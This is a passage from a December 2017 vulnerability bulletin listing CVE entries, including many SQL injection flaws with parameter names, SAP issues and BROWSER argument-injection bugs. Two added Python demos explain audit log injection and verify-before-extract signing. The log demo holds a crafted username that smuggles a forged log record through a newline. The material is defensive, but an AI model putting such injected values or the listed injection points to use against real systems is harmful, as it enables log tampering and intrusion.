Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-15944
Source & Patch Info: BID, SECTRACK, CONFIRM

panda_security -- panda_global_protection
Panda Global Protection 17.0.1 allows a system crash via a 0xb3702c04 \\.\PSMEMDriver DeviceIoControl request.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17684
Source & Patch Info: MISC

panda_security -- panda_global_protection
Panda Global Protection 17.0.1 allows a system crash via a 0xb3702c44 \\.\PSMEMDriver DeviceIoControl request.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17683
Source & Patch Info: MISC

pandora -- ios_app
Pandora iOS app prior to version 8.3.2 fails to properly validate SSL certificates provided by HTTPS connections, which may enable an attacker to conduct man-in-the-middle (MITM) attacks.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-3194
Source & Patch Info: BID, MISC, CERT-VN, MISC

pasdoc -- pasdoc
** DISPUTED ** delphi_gui/WWWBrowserRunnerDM.pas in PasDoc 0.14 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a software maintainer has indicated that the code referencing the BROWSER environment variable is never used.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17527
Source & Patch Info: MISC

pcausa -- rawether_framework
PCAUSA Rawether framework does not properly validate BPF data, allowing a crafted malicious BPF program to perform operations on memory outside of its typical bounds on the driver's receipt of network packets. Local attackers can exploit this issue to execute arbitrary code with SYSTEM privileges.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-3196
Source & Patch Info: MISC, BID, MISC, CERT-VN

phabricator -- phabricator
Phabricator before 2017-11-10 does not block the --config and --debugger flags to the Mercurial hg program, which allows remote attackers to execute arbitrary code by using the web UI to browse a branch whose name begins with a --config= or --debugger= substring.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-17536
Source & Patch Info: MISC, MISC

phoenix_contact -- fl_comserver
A Cross-site Scripting issue was discovered in PHOENIX CONTACT FL COMSERVER BASIC 232/422/485, FL COMSERVER UNI 232/422/485, FL COMSERVER BAS 232/422/485-T, FL COMSERVER UNI 232/422/485-T, FL COM SERVER RS232, FL COM SERVER RS485, and PSI-MODEM/ETH (running firmware versions prior to 1.99, 2.20, or 2.40). The identified cross-site scripting vulnerability may allow remote code execution.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-16723
Source & Patch Info: BID, MISC, MISC

phpscriptsmall.com -- advance_b2b_script
Advance B2B Script 2.1.3 has SQL Injection via the tradeshow-list-detail.php show_id or view-product.php pid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17602
Source & Patch Info: MISC

phpscriptsmall.com -- advance_online_learning_managment_script
Advance Online Learning Management Script 3.1 has SQL Injection via the courselist.php subcatid or popcourseid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17599
Source & Patch Info: MISC

phpscriptsmall.com -- advanced_real_estate_script
Advanced Real Estate Script 4.0.7 has SQL Injection via the search-results.php Projectmain, proj_type, searchtext, sell_price, or maxprice parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17603
Source & Patch Info: MISC

phpscriptsmall.com -- advanced_world_database
Advanced World Database 2.0.5 has SQL Injection via the city.php country or state parameter, or the state.php country parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17640
Source & Patch Info: MISC

phpscriptsmall.com -- affiliate_mlm_script
Affiliate MLM Script 1.0 has SQL Injection via the product-category.php key parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17598
Source & Patch Info: MISC

phpscriptsmall.com -- basic_b2b_script
Basic B2B Script 2.0.8 has SQL Injection via the product_details.php id parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17600
Source & Patch Info: MISC

phpscriptsmall.com -- beauty_parlour_booking_script
Beauty Parlour Booking Script 1.0 has SQL Injection via the /list gender or city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17595
Source & Patch Info: MISC

phpscriptsmall.com -- cab_booking_script
Cab Booking Script 1.0 has SQL Injection via the /service-list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17601
Source & Patch Info: MISC

phpscriptsmall.com -- car_rental_script
Car Rental Script 2.0.4 has SQL Injection via the countrycode1.php val parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17637
Source & Patch Info: MISC

phpscriptsmall.com -- chartered_accountant_booking_script
Chartered Accountant Booking Script 1.0 has SQL Injection via the /service-list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17609
Source & Patch Info: MISC

phpscriptsmall.com -- child_care_script
Child Care Script 1.0 has SQL Injection via the /list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17608
Source & Patch Info: MISC

phpscriptsmall.com -- cms_auditor_website
CMS Auditor Website 1.0 has SQL Injection via the PATH_INFO to /news-detail.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17607
Source & Patch Info: MISC

phpscriptsmall.com -- co-work_space_search_script
Co-work Space Search Script 1.0 has SQL Injection via the /list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17606
Source & Patch Info: MISC

phpscriptsmall.com -- consumer_complaints_clone_script
Consumer Complaints Clone Script 1.0 has SQL Injection via the other-user-profile.php id parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17605
Source & Patch Info: MISC

phpscriptsmall.com -- doctor_search_script
Doctor Search Script 1.0 has SQL Injection via the /list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17611
Source & Patch Info: MISC

phpscriptsmall.com -- domainsale_php_script
DomainSale PHP Script 1.0 has SQL Injection via the domain.php id parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17594
Source & Patch Info: MISC

phpscriptsmall.com -- e-commerce_mlm_software
E-commerce MLM Software 1.0 has SQL Injection via the service_detail.php pid parameter, event_detail.php eventid parameter, or news_detail.php newid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17610
Source & Patch Info: MISC

phpscriptsmall.com -- entrepreneur_bus_booking_script
Entrepreneur Bus Booking Script 3.0.4 has SQL Injection via the booker_details.php sourcebus parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17604
Source & Patch Info: MISC

phpscriptsmall.com -- entrepreneur_dating_script
Entrepreneur Dating Script 2.0.1 has SQL Injection via the search_result.php marital, gender, country, or profileid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17648
Source & Patch Info: EXPLOIT-DB

phpscriptsmall.com -- entrepreneur_job_portal_script
Entrepreneur Job Portal Script 2.0.6 has SQL Injection via the jobsearch_all.php rid1 parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17596
Source & Patch Info: MISC

phpscriptsmall.com -- event_search_script
Event Search Script 1.0 has SQL Injection via the /event-list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17616
Source & Patch Info: MISC

phpscriptsmall.com -- facebook_clone_script
Facebook Clone Script 1.0 has SQL Injection via the friend-profile.php id parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17615
Source & Patch Info: MISC

phpscriptsmall.com -- food_order_script
Food Order Script 1.0 has SQL Injection via the /list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17614
Source & Patch Info: MISC

phpscriptsmall.com -- foodspotting_clone_script
Foodspotting Clone Script 1.0 has SQL Injection via the quicksearch.php q parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17617
Source & Patch Info: MISC

phpscriptsmall.com -- freelance_website_script
Freelance Website Script 2.0.6 has SQL Injection via the jobdetails.php pr_id parameter or the searchbycat_list.php catid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17613
Source & Patch Info: MISC

phpscriptsmall.com -- groupon_clone_script
Groupon Clone Script 3.01 has SQL Injection via the city_ajax.php state_id parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17638
Source & Patch Info: MISC

phpscriptsmall.com -- hot_scripts_clone
Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17612
Source & Patch Info: MISC

phpscriptsmall.com -- kickstarter_clone_script
Kickstarter Clone Script 2.0 has SQL Injection via the investcalc.php projid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17618
Source & Patch Info: MISC

phpscriptsmall.com -- laundry_booking_script
Laundry Booking Script 1.0 has SQL Injection via the /list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17619
Source & Patch Info: MISC, MISC

phpscriptsmall.com -- lawyer_search_script
Lawyer Search Script 1.1 has SQL Injection via the /lawyer-list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17620
Source & Patch Info: MISC

phpscriptsmall.com -- mlm_forced_matrix
MLM Forced Matrix 2.0.9 has SQL Injection via the news-detail.php newid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17636
Source & Patch Info: MISC

phpscriptsmall.com -- mlm_forex_market_plan_script
MLM Forex Market Plan Script 2.0.4 has SQL Injection via the news_detail.php newid parameter or the event_detail.php eventid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17635
Source & Patch Info: MISC

phpscriptsmall.com -- multiplex_movie_theater_booking_script
Multiplex Movie Theater Booking Script 3.1.5 has SQL Injection via the trailer-detail.php moid parameter, show-time.php moid parameter, or event-detail.php eid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17633
Source & Patch Info: MISC

phpscriptsmall.com -- multireligion_responsive_matrimonial
Multireligion Responsive Matrimonial 4.7.2 has SQL Injection via the success-story.php succid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17631
Source & Patch Info: MISC

phpscriptsmall.com -- multivendor_penny_auction_clone_script
Multivendor Penny Auction Clone Script 1.0 has SQL Injection via the PATH_INFO to the /detail URI.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17621
Source & Patch Info: MISC, MISC

phpscriptsmall.com -- muslim_matrimonial_script
Muslim Matrimonial Script 3.02 has SQL Injection via the success-story.php succid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17639
Source & Patch Info: MISC

phpscriptsmall.com -- nearbuy_clone_script
Nearbuy Clone Script 3.2 has SQL Injection via the category_list.php search parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17597
Source & Patch Info: MISC

phpscriptsmall.com -- online_exam_test_application_script
Online Exam Test Application Script 1.6 has SQL Injection via the exams.php sort parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17622
Source & Patch Info: MISC, MISC

phpscriptsmall.com -- opensource_classified_ads_script
Opensource Classified Ads Script 3.2 has SQL Injection via the advance_result.php keyword parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17623
Source & Patch Info: MISC

phpscriptsmall.com -- php_multivendor_ecommerce
PHP Multivendor Ecommerce 1.0 has SQL Injection via the single_detail.php sid parameter, or the category.php searchcat or chid1 parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17624
Source & Patch Info: MISC

phpscriptsmall.com -- professional_service_script
Professional Service Script 1.0 has SQL Injection via the service-list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17625
Source & Patch Info: MISC

phpscriptsmall.com -- readymade_php_classified_script
Readymade PHP Classified Script 3.3 has SQL Injection via the /categories subctid or mctid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17626
Source & Patch Info: MISC

phpscriptsmall.com -- readymade_video_sharing_script
Readymade Video Sharing Script 3.2 has SQL Injection via the single-video-detail.php report_videos array parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17627
Source & Patch Info: MISC

phpscriptsmall.com -- responsive_events_and_movie_ticket_booking_script
Responsive Events And Movie Ticket Booking Script 3.2.1 has SQL Injection via the findcity.php q parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17632
Source & Patch Info: MISC

phpscriptsmall.com -- responsive_realestate_script
Responsive Realestate Script 3.2 has SQL Injection via the property-list tbud parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17628
Source & Patch Info: MISC

phpscriptsmall.com -- resume_clone_script
Resume Clone Script 2.0.5 has SQL Injection via the preview.php id parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17641
Source & Patch Info: MISC

phpscriptsmall.com -- secure_e-commerce_script
Secure E-commerce Script 2.0.1 has SQL Injection via the category.php searchmain or searchcat parameter, or the single_detail.php sid parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17629
Source & Patch Info: MISC

phpscriptsmall.com -- single_theater_booking_script
Single Theater Booking Script 3.2.1 has SQL Injection via the findcity.php q parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17634
Source & Patch Info: MISC

phpscriptsmall.com -- yoga_class_script
Yoga Class Script 1.0 has SQL Injection via the /list city parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17630
Source & Patch Info: MISC

phusion_passenger -- phusion_passenger
In agent/Core/SpawningKit/Spawner.h in Phusion Passenger 5.1.10 (fixed in Passenger Open Source 5.1.11 and Passenger Enterprise 5.1.10), if Passenger is running as root, it is possible to list the contents of arbitrary files on a system by symlinking a file named REVISION from the application root folder to a file of choice and querying passenger-status --show=xml.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-16355
Source & Patch Info: CONFIRM, CONFIRM

posty -- readymade_classifieds_script
Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-17111
Source & Patch Info: MISC

posty -- scubez_posty_readymade_classifieds
Scubez Posty Readymade Classifieds has SQL Injection via the admin/user_activate_submit.php ID parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17567
Source & Patch Info: MISC

posty -- scubez_posty_readymade_classifieds
Scubez Posty Readymade Classifieds has XSS via the admin/user_activate_submit.php ID parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17569
Source & Patch Info: MISC

posty -- scubez_posty_readymade_classifieds
Scubez Posty Readymade Classifieds has Incorrect Access Control for visiting admin/user_activate_submit.php (aka the backend PHP script), which might allow remote attackers to obtain sensitive information via a direct request.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17568
Source & Patch Info: MISC

ppm_2000 -- perspective_icm


 
Perspective ICM Investigation & Case 5.1.1.16 allows remote authenticated users to modify access level permissions and consequently gain privileges by leveraging insufficient validation methods and missing cross server side checking mechanisms.2017-12-11not yet calculatedCVE-2017-11319
MISC
puppet -- puppet_enterprise
 
Cross-site scripting (XSS) vulnerability in the console in Puppet Enterprise before 2015.2.1 allows remote attackers to inject arbitrary web script or HTML via the string parameter, related to Login Redirect.2017-12-11not yet calculatedCVE-2015-6502
CONFIRM
puppet -- puppet_enterprise

 
The console in Puppet Enterprise 3.7.x, 3.8.x, and 2015.2.x does not set the secure flag for the JSESSIONID cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session.2017-12-11not yet calculatedCVE-2015-8470
CONFIRM
puppet -- puppetlabs-apache
The default vhost configuration file in Puppet before 3.6.2 does not include the SSLCARevocationCheck directive, which might allow remote attackers to obtain sensitive information via a revoked certificate when a Puppet master runs with Apache 2.4. Published: 2017-12-11. CVSS: not yet calculated. CVE-2014-3250
CONFIRM
CONFIRM
python -- python
Lib/webbrowser.py in Python through 3.6.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-17522
MISC
qnap -- qsync_for_windows
A DLL Hijacking vulnerability in QNAP Qsync for Windows (exe) version 4.2.2.0724 and earlier could allow remote attackers to execute arbitrary code on Windows machines. Published: 2017-12-11. CVSS: not yet calculated. CVE-2017-13070
CONFIRM
qt_company -- qt_for_android
A vulnerability in applications created using Qt for Android prior to 5.9.3 allows attackers to alter environment variables via unspecified vectors. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-10905
CONFIRM
JVN
qt_company -- qt_for_android
Qt for Android prior to 5.9.0 allows remote attackers to execute arbitrary OS commands via unspecified vectors. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-10904
CONFIRM
JVN
radware -- alteon_devices
Radware Alteon devices with a firmware version between 31.0.0.0 and 31.0.3.0 are vulnerable to an adaptive chosen-ciphertext attack ("Bleichenbacher attack"). This allows an attacker to decrypt observed traffic that was protected by RSA key exchange and to perform other private-key operations with the server's key. Published: 2017-12-13. CVSS: not yet calculated. CVE-2017-17427
BID
MISC
CONFIRM
CERT-VN
rapid7 -- nexpose
Versions of Nexpose prior to 6.4.66 fail to adequately validate the source of HTTP requests intended for the Automated Actions administrative web application, and are susceptible to a cross-site request forgery (CSRF) attack. Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-5264
CONFIRM
reddit -- reddit_terminal_viewer
scripts/inspect_webbrowser.py in Reddit Terminal Viewer (RTV) 1.19.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-17516
MISC
ruby -- ruby
Ruby before 2.4.3 allows Net::FTP command injection. Net::FTP#get, getbinaryfile, gettextfile, put, putbinaryfile, and puttextfile use Kernel#open to open a local file. If the localfile argument starts with the "|" pipe character, the command following the pipe character is executed. The default value of localfile is File.basename(remotefile), so malicious FTP servers could cause arbitrary command execution. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-17405
CONFIRM
CONFIRM
sap -- business_intelligence_promotion_management_application
Cross-Site Scripting (XSS) vulnerability in SAP Business Intelligence Promotion Management Application, Enterprise 4.10, 4.20, 4.30, as user controlled inputs are not sufficiently encoded. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16681
BID
CONFIRM
CONFIRM
sap -- business_intelligence_promotion_management_application
SAP Business Intelligence Promotion Management Application, Enterprise 4.10, 4.20, and 4.30, does not perform authentication checks for functionalities that require user identity. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16684
BID
CONFIRM
CONFIRM
sap -- business_objects_platform
Denial of Service (DoS) in SAP Business Objects Platform, Enterprise 4.10 and 4.20, that could allow an attacker to prevent legitimate users from accessing a service. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16683
BID
CONFIRM
CONFIRM
sap -- business_warehouse_universal_data_integration
Cross-Site scripting (XSS) in SAP Business Warehouse Universal Data Integration, from 7.10 to 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, due to insufficient encoding of user controlled inputs. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16685
BID
CONFIRM
CONFIRM
sap -- hana
The user self-service tools of SAP HANA extended application services, classic user self-service, a part of SAP HANA Database versions 1.00 and 2.00, can be misused to enumerate valid and invalid user accounts. An unauthenticated user could use the error messages to determine if a given username is valid. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16687
BID
CONFIRM
CONFIRM
sap -- hana
Two potential audit log injections in SAP HANA extended application services 1.0, advanced model: 1) Certain HTTP/REST endpoints of controller service are missing user input validation which could allow unprivileged attackers to forge audit log lines. Hence the interpretation of audit log files could be hindered or misdirected. 2) User Account and Authentication writes audit logs into syslog and additionally writes the same audit entries into a log file. Entries in the log file miss escaping. Hence the interpretation of audit log files could be hindered or misdirected, while the entries in syslog are correct. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16680
BID
CONFIRM
CONFIRM
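The HANA entry above describes the mechanism of audit log injection: a field value that contains a line break lands in a line-oriented log file unescaped, so whatever follows the break is read back as a separate, forged record (the syslog copy was correct because that path escaped the value). The added example below is not SAP's code; it writes the same constructed event with a raw writer, an escaping writer, and a JSON writer, then reads each log back with the kind of one-record-per-line parser an investigator or SIEM would use.

```python
import json


def vulnerable_audit_line(event, user, detail):
    """Raw interpolation: any separator in a value becomes part of the log structure."""
    return f"{event} user={user} detail={detail}\n"


def escaped_audit_line(event, user, detail):
    """Quote every value and escape backslash, newline, carriage return and quote,
    so an attacker-supplied value cannot leave its field or its line."""
    def esc(v):
        return (v.replace("\\", "\\\\").replace("\n", "\\n")
                 .replace("\r", "\\r").replace('"', '\\"'))
    return f'{event} user="{esc(user)}" detail="{esc(detail)}"\n'


def json_audit_line(event, user, detail):
    """Structured logging: the serializer does the escaping and consumers
    parse records instead of guessing at delimiters."""
    return json.dumps({"event": event, "user": user, "detail": detail}) + "\n"


def parse_events(log_text):
    """A reviewer's parser: one physical line is one audit event, and the
    first token is the event name."""
    return [line.split(" ", 1)[0] for line in log_text.splitlines() if line]


def demo():
    # Constructed attacker input: a "username" carrying a newline and a forged record.
    forged_user = "alice\nLOGIN_SUCCESS user=admin detail=from-console"
    raw = vulnerable_audit_line("LOGIN_FAILURE", forged_user, "bad password")
    esc = escaped_audit_line("LOGIN_FAILURE", forged_user, "bad password")
    js = json_audit_line("LOGIN_FAILURE", forged_user, "bad password")
    return {
        "raw_events": parse_events(raw),            # forged LOGIN_SUCCESS appears
        "escaped_events": parse_events(esc),        # single LOGIN_FAILURE record
        "json_events": [json.loads(l)["event"] for l in js.splitlines()],
        "json_user_roundtrip": json.loads(js)["user"] == forged_user,
    }


if __name__ == "__main__":
    print(demo())
```

The escaping writer keeps the log greppable while making it unambiguous; the JSON writer is the better default where the consumer can parse it, and both fix the defect at the writer rather than by filtering input, so the audit record still shows exactly what the attacker sent.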
sap -- kernel
A Trusted RFC connection in SAP KERNEL 32NUC, SAP KERNEL 32Unicode, SAP KERNEL 64NUC, SAP KERNEL 64Unicode 7.21, 7.21EXT, 7.22, 7.22EXT; SAP KERNEL from 7.21 to 7.22, 7.45, 7.49, can be established to a different client or a different user on the same system, although no explicit Trusted/Trusting Relation to the same system has been defined. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16689
BID
CONFIRM
CONFIRM
sap -- netweaver_internet_transaction_server
SAP NetWeaver Internet Transaction Server (ITS), SAP Basis from 7.00 to 7.02, 7.30, 7.31, 7.40, from 7.50 to 7.52, allows an attacker with administrator credentials to inject code that can be executed by the application and thereby control the behavior of the application. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16682
BID
CONFIRM
CONFIRM
sap -- netweaver_knowledge_management_configuration_service
Server Side Request Forgery (SSRF) vulnerability in SAP NetWeaver Knowledge Management Configuration Service, EPBC and EPBC2 from 7.00 to 7.02; KMC-BC 7.30, 7.31, 7.40 and 7.50, that allows an attacker to manipulate the vulnerable application to send crafted requests on behalf of the application. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16678
BID
CONFIRM
CONFIRM
sap -- note_assistant_tool
SAP Note Assistant tool (SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52) supports upload of digitally signed note files of type 'SAR'. The digital signature verification is done together with the extraction of the note file contained in the SAR archive. It is possible to append a tampered file to the SAR archive using the SAPCAR tool; during extraction the digital signature verification fails, but the tampered file has already been extracted. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16691
CONFIRM
CONFIRM
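The Note Assistant entry is an ordering bug rather than a cryptographic one: the signature check is correct, but extraction has already written the appended member by the time the check fails. The added example below is not SAP's code and does not use the SAR format; it models the archive as an uncompressed tar, the vendor signature as an HMAC over a manifest of member names and digests (a stand-in for the real asymmetric signature, chosen so the example runs offline), and compares extract-while-verifying against verify-then-extract on an archive to which an attacker has appended a member. File names and contents are constructed.

```python
import hashlib
import hmac
import io
import tarfile

# Stand-in for the vendor's signing key. Only the ordering lesson carries over
# to the real tool, where this is an asymmetric signature check.
SIGNING_KEY = b"vendor-signing-key-stand-in"


def pack(files):
    """Build an uncompressed tar (our stand-in for SAR) from (name, bytes) pairs."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tf:
        for name, data in files:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def members(archive_bytes):
    """Return the archive's file members, in order, as (name, bytes) pairs."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:") as tf:
        return [(m.name, tf.extractfile(m).read()) for m in tf.getmembers() if m.isfile()]


def manifest(files):
    """Digest over every member's name and content, in order: an extra,
    missing or altered member changes it."""
    h = hashlib.sha256()
    for name, data in files:
        h.update(name.encode() + b"\0" + hashlib.sha256(data).digest())
    return h.digest()


def sign(files):
    return hmac.new(SIGNING_KEY, manifest(files), hashlib.sha256).digest()


def verify(files, sig):
    return hmac.compare_digest(sign(files), sig)


def extract_while_verifying(archive_bytes, sig, dest):
    """Flawed order, as described for the Note Assistant: each member is written
    to dest as it is read; the signature check runs only after the loop."""
    seen = []
    for name, data in members(archive_bytes):
        dest[name] = data                  # already written when the check below fails
        seen.append((name, data))
    if not verify(seen, sig):
        raise ValueError("signature verification failed")


def verify_then_extract(archive_bytes, sig, dest):
    """Correct order: read every member, verify the manifest, then write."""
    files = members(archive_bytes)
    if not verify(files, sig):
        raise ValueError("signature verification failed")
    for name, data in files:
        dest[name] = data


def demo():
    genuine = [("note_0001.txt", b"manual steps"),
               ("note_0001.abap", b"REPORT zfix. WRITE 'patched'.")]
    archive = pack(genuine)
    sig = sign(members(archive))           # produced by the vendor
    # The attacker re-packs the archive with one member appended. A later member
    # with the same name overwrites the genuine one on extraction; the signature
    # cannot be re-made without the vendor key.
    evil = ("note_0001.abap", b"REPORT zfix. CALL FUNCTION 'SOMETHING_ELSE'.")
    tampered = pack(members(archive) + [evil])

    flawed_out, fixed_out, genuine_out = {}, {}, {}
    try:
        extract_while_verifying(tampered, sig, flawed_out)
        flawed_raised = False
    except ValueError:
        flawed_raised = True
    try:
        verify_then_extract(tampered, sig, fixed_out)
        fixed_raised = False
    except ValueError:
        fixed_raised = True
    verify_then_extract(archive, sig, genuine_out)
    return {"flawed_raised": flawed_raised,
            "flawed_abap": flawed_out.get("note_0001.abap"),
            "fixed_raised": fixed_raised,
            "fixed_files": len(fixed_out),
            "genuine_abap": genuine_out.get("note_0001.abap")}


if __name__ == "__main__":
    print(demo())
```

Both flows report a failed signature; only the first leaves the attacker's member on disk. Where the archive is too large to hold in memory, extract to a private staging directory and move it into place only after verification, which preserves the same ordering.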
sap -- plant_connectivity
A malicious DLL preload attack is possible against NwSapSetup and the installation self-extracting program for SAP Plant Connectivity 2.3 and 15.0. SAPSetup / NwSapSetup.exe may load system DLLs such as DWMAPI.dll (normally located in the SysWOW64 / System32 folder) from the folder the executable is in rather than from the system location; the desired behavior is that system DLLs are only loaded from the system folders. If a DLL with the same name as the system DLL is placed in the same folder as the executable, that DLL is loaded and its code is executed. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16690
BID
CONFIRM
CONFIRM
sap -- startup_service
URL redirection vulnerability in SAP's Startup Service, SAP KERNEL 32 NUC, SAP KERNEL 32 Unicode, SAP KERNEL 64 NUC, SAP KERNEL 64 Unicode 7.21, 7.21EXT, 7.22 and 7.22EXT; SAP KERNEL 7.21, 7.22, 7.45, 7.49 and 7.52, that allows an attacker to redirect users to a malicious site. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-16679
BID
CONFIRM
CONFIRM
scummvm -- scummvm
backends/platform/sdl/posix/posix.cpp in ScummVM 1.9.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-17528
MISC
seacms -- seacms
SeaCMS 6.56 allows remote authenticated administrators to execute arbitrary PHP code via a crafted token field to admin/admin_ping.php, which interacts with data/admin/ping.php. Published: 2017-12-12. CVSS: not yet calculated. CVE-2017-17561
MISC
MISC
sensible-utils -- sensible-utils
sensible-browser in sensible-utils before 0.0.11 does not validate strings before launching the program specified by the BROWSER environment variable, which allows remote attackers to conduct argument-injection attacks via a crafted URL, as demonstrated by a --proxy-pac-file argument. Published: 2017-12-11. CVSS: not yet calculated. CVE-2017-17512
MISC
MISC
synology -- mailplus_server
Cross-site scripting (XSS) vulnerability in Disclaimer in Synology MailPlus Server before 1.4.0-0415 allows remote authenticated users to inject arbitrary web script or HTML via the NAME parameter. Published: 2017-12-15. CVSS: not yet calculated. CVE-2017-15890
CONFIRM
swi-prolog -- swi-prolog
library/www_browser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-17524
MISC
sylpheed -- sylpheed
libsylph/utils.c in Sylpheed through 3.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. Published: 2017-12-14. CVSS: not yet calculated. CVE-2017-17517
MISC
symantec -- norton_family_android_app
